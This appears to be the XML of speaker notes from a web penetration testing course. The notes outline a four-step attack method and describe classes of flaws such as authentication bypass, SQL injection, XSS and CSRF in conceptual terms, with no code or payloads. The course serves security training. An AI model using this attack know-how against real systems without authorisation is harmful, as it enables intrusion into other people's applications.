            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proven – This methodology has been used for years by penetration testers.  These testers have shown that by following this methodology, they have been able to find and exploit problems with websites around the globe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Repeatable – One of the biggest problems with security testing is the issue of false positives.  Finding something and labeling it vulnerable when it really wasn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t.  This is fixed by having a repeatable test.  If a finding is doubted or you just want to show it to management, having a repeatable test is critical.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explainable – I think that everyone has worked with that expert that can find the issue and fix it, but can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t seem to explain how he found it.  If we are going to be able to grow the field and continue helping secure our environment into the future, we need to be able to teach and explain what we do.  This methodology fulfills that need.</a:t>
            </a:r>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30720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In the next section, we will start to understand how the attacker works. We will build a four-step web penetration methodology process to use over the next few days.</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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30822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Attack methodology:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Reconnaissance: We research the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Mapping: We understand what makes up the application and its surroundings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Discovery: We look for the vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Exploitation: We launch the attacks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attack process is cyclical.  Once you exploit a vulnerability, you can further the exploitation by starting the process again from that point.  For example, if I am successful in launching a SQL injection attack that allows me to execute commands on a server, I will start looking around to see what else I can uncover.  The knowledge I gained in this exploit helps me further the next attack.  This is important since we aren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t a typical attacker– instead of just trying to penetrate the system in one way, we want to find as many of the problems as possible, so that we can fix them.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="2" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30925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Reconnaissance is the first step in this four-step process.  It is often skipped, to the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s detriment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance provides the foundation for a successful, efficient attack.  Sadly, many attackers skip this step, thinking it is a waste of time, and blindly start launching attacks.  This can be successful, but it is inefficient and can tip off the target. By focusing our time on finding out as much as possible before we start launching attacks, we can better focus our efforts and lower the risk of detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance is when the attacker starts to identify the target. We also use external resources such as Google and Monster.com to collect information about the target without accessing the target directly.</a:t>
            </a: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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310276" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719138" y="4560888"/>
            <a:ext cx="5867400" cy="4319587"/>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The second step in our attack process is mapping.  This step usually takes the least amount of time, but if it is not done correctly, all of the later steps are either more difficult or impossible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During the mapping phase, we try to understand how all the pieces of an application fit together, and identify places where we may be able to leverage the relationships between pages for greater access. Typically, service, OS and application enumeration and identification also occurs here. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping the application enables the attacker to see all of the various pieces of the application in one place. We also collect session identifiers during this mapping, so that we can gain a better understanding of how session state is maintained.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are three main steps to mapping.  First, download the entire site by spidering the server.  Next, use the results from that step to figure out how things fit together and understand the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s flow.  While performing those two steps, the third step is to gather various session ids and tokens.  These will be useful in identifying potential vulnerabilities. </a:t>
            </a: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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311300" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719138" y="4560888"/>
            <a:ext cx="5867400" cy="4319587"/>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The discovery phase is the third step in our methodology, and the first step that involves potentially malicious traffic.  This step is where we will begin to explore the application and find its vulnerable spots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery is where we really start to explore the application in a much deeper way. We will search for potential vulnerabilities and information we can use to plan the attack in the next phase.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As part of the discovery phase, we will begin to identify weaknesses within the application. We will expand our application map, and begin building and using our attack tools.  This can involve actually writing scripts or tools designed to take advantage of a specific site configuration or weakness.</a:t>
            </a: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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31232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Exploitation is the final step in the attack.  This is the step where the attacker will take all of the information gathered up to this point, and use it to exploit the application.  As we will see, this can involve dumping a database, or pivoting through the application to attack the rest of the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation is when we launch our attacks. A lot of penetration testers focus on this stage, to the detriment of their testing, since exploitation builds upon all of the information we have gathered and tasks we have completed up to this point.  Without the first three steps, exploitation typically fails.  </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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31334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Remember, as we discussed earlier, the attack process is cyclical in nature.  When we exploit a vulnerability, we start the process again, leveraging our new access and information. Unlike the evil attackers, the job of penetration testers is to find as many of the vulnerabilities as possible -- not simply to grab data and run!</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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31437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In the next section, we outline the various types of flaws we will be covering in class. There are three types of exploitation that we are going to cover in this class.  "Leakage" involves the disclosure of information.  "Bypass" is when the attacker is able to circumvent some form of authentication or logic.  "Input" is when the attacker is able to enter data that will cause problems within the application or the clients of the application.</a:t>
            </a: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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31539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A leakage flaw allows the attacker to discover information about application configuration or state. This information can be used to launch much more damaging attacks when a focused attacker is at work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Leakage flaws occur surprisingly often in the real world.  When penetration testers point them out to developers, a common response is, "That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s ok, what kind of harm can come from that?"  The value of information gathered from leakage flaw is frequently underestimated. The smart attacker can leverage information such as application installation paths and database error messages to plan their attack. These messages will even be useful in attack execution, as we will see during exploitation. </a:t>
            </a:r>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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316420"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Configuration issues with the web server or its operating system can allow the attacker to exploit the system no matter how secure the application was designed.  It is very common for this to happen because there is little communication or bad communication between the developers and the administrators.</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119</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Knowledge of tools is fundamental.  You do not need to memorize command line options or parameters to every tool around; that is why we have man pages and help screens.  You simply need to be familiar with the penetration testing tools that exist, and understand their capabilities so that you can leverage them appropriately. This class does not attempt to show you every tool or option, but we do expose you to a wide variety of tools and explain how they can be used together to uncover issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another thing that we would like to impress upon you is that everyone can help by making the tools we use better.  This may be by developing patches or writing your own and releasing it.  Or even just submitting bug reports and forum postings helping others use the tools. The tools that you use are complex, and have been developed and improved by many people, and we encourage you to contribute. We are only as good as we make ourselves.  </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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31744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pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass flaws allow the attacker to circumvent controls.  This may gain the attacker more access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>within the application, or even allow him or her to access and modify files on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication Bypass:  Some portion of the application allows us to provide it with session information such as who we want to be, without going through the authentication process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authorization Bypass:  Some pages assume that a user has gone through another page which validates authorization.  By directly visiting the links, these pages can be accessed without such authorization taking place.  Session fixation also falls into this category.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File Control Bypass:  Files are made available which are not intended for general consumption.  Log files, source code, and confidential information are often the fruits of these attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Front End Bypass:  Back-end resources are directly accessible.  This can include web services, databases, and partner resources, among other things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31846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Input flaws are very common, and fundamental to well-known attacks such as SQL Injection and Cross Site Scripting.  They occur when the developer has placed too much trust in the client, and accepted input with inadequate filtering.  This allows an attacker to inject malicious items that the application or the client acts upon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An attacker can run commands on the server through the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code such as PHP or VB is run within the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attacker can control a query within the web app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An attacker can inject client-side code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An attacker is able to inject headers that will be reflected to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="-174625">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>An attacker can inject a transaction via a legitimate user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31949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This section is an overview of JavaScript.  We will explore the language basics and how to write scripts used during a penetration test.</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
